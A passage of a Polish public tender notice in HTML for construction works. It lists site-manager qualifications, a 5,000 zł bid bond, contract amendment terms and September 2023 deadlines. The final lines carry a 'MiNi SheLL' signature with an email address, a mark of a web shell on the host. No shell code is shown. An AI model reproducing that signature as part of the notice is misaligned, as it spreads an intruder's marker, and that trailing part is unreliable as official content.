kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2023 r. poz. 682 t.j.) wraz z rozporządzeniami<br/>wykonawczymi lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących<br/>przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej<br/>lub państw członkowskich Europejskiego Porozumienia o wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze<br/>Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności,<br/>jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220);<br/><br/>• wpis na listę członków izby samorządu zawodowego;<br/><br/>• minimum 12-miesięczne doświadczenie zawodowe w pełnieniu funkcji kierownika budowy w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych:<br/><br/>1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>5 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Niezależnie od podstaw przewidzianych w Pzp Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 Pzp,<br/>możliwość dokonywania zmian postanowień umowy, w zakresie:<br/>1) zmiany terminu realizacji przedmiotu umowy, jeżeli wystąpi konieczność zrealizowania jakiejkolwiek części robót, objętej<br/>przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w<br/>dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o<br/>który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym<br/>wykonaniem przedmiotu umowy. Termin może być zmieniony pod warunkiem, że odmienne rozwiązania techniczne lub<br/>technologiczne, wymagają obiektywnie dłuższego terminu realizacji, co zostanie wykazane przez Wykonawcę, a zmiana<br/>terminu nie będzie dłuższa niż różnica między prowadzonymi zgodnie ze sztuką rozwiązaniami odmiennymi, a wskazanymi<br/>w dokumentacji projektowej.<br/>2) zmiany terminu realizacji przedmiotu umowy, w przypadku wystąpienia warunków na placu budowy odbiegających w<br/>sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych. Zmiana terminu może nastąpić o okres wymagany<br/>do doprowadzenia warunków na placu budowy do stanu przyjętego w dokumentacji projektowej.<br/>3) zmiany terminu realizacji przedmiotu umowy, w przypadku wystąpienia niebezpieczeństwa kolizji z planowanymi lub<br/>równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub<br/>usunięcia tych kolizji.<br/>4) zmiany terminu realizacji przedmiotu umowy spowodowanej koniecznością wykonania zamówień (robót) zamiennych<br/>oraz tych ujętych w pkt 11, o okres niezbędny do wykonania tych robót.<br/>5) zmiany terminu realizacji przedmiotu umowy, w przypadku przedłużającego się terminu wydania przez właściwe organy<br/>decyzji, pozwoleń, uzgodnień, itp., z przyczyn niezawinionych przez Wykonawcę, o okres równy przedłużonemu terminowi<br/>wydania decyzji, pozwoleń, uzgodnień, itp.<br/>6) zmiany terminu realizacji przedmiotu umowy, w przypadku wstrzymania robót przez Zamawiającego, z przyczyn<br/>niezawinionych przez Wykonawcę, o okres równy okresowi wstrzymania robót;<br/>7) zmiany terminu realizacji przedmiotu umowy w przypadku wstrzymania robót, z przyczyn niezawinionych przez<br/>Wykonawcę spowodowanych wystąpieniem niekorzystnych warunków atmosferycznych, które uniemożliwiają wykonanie<br/>przedmiotu umowy .<br/>8) zmiany terminu realizacji przedmiotu umowy, w przypadku zmian powodujących opóźnienie w stosunku do zapisów<br/>umowy w terminie przekazania Wykonawcy placu budowy oraz dokumentacji budowlanej, z przyczyn niezawinionych przez<br/>Wykonawcę, o okres równy przekroczeniu terminu w jakim miało nastąpić przekazanie Wykonawcy placu budowy oraz<br/>dokumentacji budowlanej.<br/>(...)<br/>2. Nie stanowi zmiany umowy w rozumieniu art. 455 ustawy Pzp w szczególności:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego);<br/>2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami;<br/>3) zmiana/aktualizacje Harmonogramu po uprzedniej akceptacji Zamawiającego, jeżeli nie wpływa to na termin zakończenia<br/>realizacji umowy.<br/>3. Każda, ze Stron umowy niezwłocznie powiadamia druga Stronę umowy o wystąpieniu okoliczności stanowiących<br/>podstawę do zmiany umowy.<br/>4. Zmiany, o których mowa w ust. 1 pkt 1-8 zostaną wprowadzone w przypadku wystąpienia okoliczności w nich opisanych,<br/>chyba że Wykonawca uzna zmiany terminu realizacji przedmiotu umowy za zbędne. Pozostałe postanowienia stanowią<br/>katalog zmian, na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com